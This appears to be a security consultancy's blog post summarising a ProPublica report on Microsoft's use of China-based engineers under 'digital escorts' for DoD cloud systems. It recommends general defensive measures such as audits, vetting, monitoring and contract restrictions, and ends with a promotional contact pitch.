A recent ProPublica investigation reveals that Microsoft employs engineers based in China to maintain DoD computer systems, focusing on cloud services for sensitive but unclassified “high impact level” data (Impact Levels 4 and 5) supporting military operations. Compromise of this data could severely affect national security, operations, assets, and individuals. This arrangement, ongoing for nearly a decade and first reported here, was crucial for Microsoft’s federal cloud contracts.
To reduce risk, Microsoft employs “digital escorts”—U.S. citizens with security clearances—who remotely monitor foreign engineers. Many escorts lack advanced technical skills, with some being former military personnel without coding experience and paid near minimum wage. This limits their ability to detect malicious actions, creating vulnerabilities. Internal Microsoft warnings cited espionage risks, especially given China’s cyber threat status (e.g., the 2023 U.S. officials’ email hack). Experts, including former intelligence officials like Harry Coker, consider this a greater threat than TikTok data concerns.
Microsoft states it complies with government requirements, including no direct foreign data access, specialized escort training, and an internal “Lockbox” review. However, former DoD officials like John Sherman were unaware and called for reviews. The Defense Information Systems Agency (DISA) requires providers to vet specialists but did not address escort qualifications. Other cloud providers (AWS, Google, Oracle) did not confirm similar practices.
Measures for Prevention
To avert the vulnerabilities described—such as insufficient scrutiny of foreign engineers gaining access to sensitive systems, which can lead to risks associated with espionage, sabotage, or data breaches—both government agencies and commercial companies can adopt several countermeasures. These focus on boosting security controls, limiting reliance on risky personnel, and ramping up monitoring.
Some basic recommended controls follow below.
Conduct Comprehensive Audits and Reviews:
Order independent audits right now of the cloud service providers’ operations, and make sure these are done by U.S. persons (not foreign temps). For cloud services that work with the DOD, it would be prudent (and in keeping with the suggestion by former DOD CIO John Sherman) for DISA or Cyber Command to lead a thorough review first—of the service itself and then of the supply chain.
Strengthen Contractual Requirements:
Revise procurement contracts to bar or severely restrict engineers from hostile countries (like China) from maintaining high-impact data. Mandate that all critical support be performed by personnel in the U.S., who have been security cleared and possess the verified technical chops to do the job.
Enhance Vetting and Qualification Standards:
Set the number of necessary qualifications for digital escorts (or similar roles). For example, the new minimums could include mandatory technical certifications (like those in cybersecurity or cloud engineering), a pay scale that attracts skilled talent, and, a layer of ongoing training for digital escorts.
Implement Advanced Monitoring and Access Controls:
Mandate real-time logging, AI-driven anomaly detection, and multi-factor authentication for all system access. Agencies should implement government-operated tools to independently monitor sessions and allow escorts to flag any suspicious scripts or activities.
Diversify and Redundancy Planning:
Transition to several cloud providers or a hybrid model to preclude overdependence on any single vendor. Draw up contingency plans for rapid contract termination should any of the confirmed risks materialize. Prioritize sourcing of all IT support from inside the country or from allied countries.
Policy and Regulatory Updates:
ODNI or Congress could issue guidance to classify those partnerships as high-risk and fold them into the broader cyber threat framework. This might include visa restrictions or export controls on sensitive tech knowledge.
These controls use the authority of the government to ensure that compliance happens. They could potentially stop breaches like the Chinese email hacks from happening again.
Require Data Security Audits for all DoD agencies on a semi-annual basis:
A data security audit is a systematic and comprehensive evaluation of an organization’s information systems, processes, policies, and controls related to data handling, storage, and protection. A data security audit at a basic level does the following:
Risk Identification: Identify security weaknesses, such as outdated software, misconfigurations, or poor access controls, that could cause data loss or exploitation.
Compliance Verification: Ensure compliance with legal and industry standards to avoid fines and reputational harm.
Improvement Recommendations: Provide actionable steps to strengthen data integrity, confidentiality, and availability, including ongoing monitoring strategies.
Threat Prevention: Address cyber risks from malware, insider threats, or external hackers to prevent data breaches.
Be Proactive, Not Reactive
Contact TMPC Inc today to learn how we can strengthen your insider threat program and ensure full compliance.
For more information, visit our site, reach out on the contact page, or directly email at joe.teasley@tmpcinc.com where you can find out more about proper Insider Threat Risk Management and get in touch with our team for your operations.